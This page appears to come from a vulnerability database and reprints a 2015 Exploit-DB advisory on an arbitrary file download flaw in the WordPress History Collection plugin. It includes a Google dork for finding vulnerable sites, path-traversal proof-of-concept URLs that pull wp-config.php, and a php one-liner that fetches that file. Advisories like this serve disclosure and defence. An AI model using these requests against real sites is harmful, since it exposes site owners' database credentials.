Wordpress History Collection

vendor:

History Collection

by:

Kuroi'SH

8.8

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: History Collection

Affected Version From: <=1.1.1

Affected Version To: <=1.1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:wordpress

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2015

WordPress History Collection <=1.1.1 Arbitraty File Download

Wordpress history collection plugin contains a file called download.php which is not filtering the GET input, it then uses this get input value to force the download of a file. Proof of concept is provided in the text.

Mitigation:

Ensure that user input is properly sanitized and validated before being used to access files.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress History Collection <=1.1.1 Arbitraty File
Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux

I-Description:
Wordpress history collection plugin contains a file called download.php
which is not filtering the GET input, it then uses this get input value to
force the download of a file.
(download.php, line 44):
header("Content-Disposition: attachment;
filename=\"".basename($filename)."\";" );
2:Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php')
;"

Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH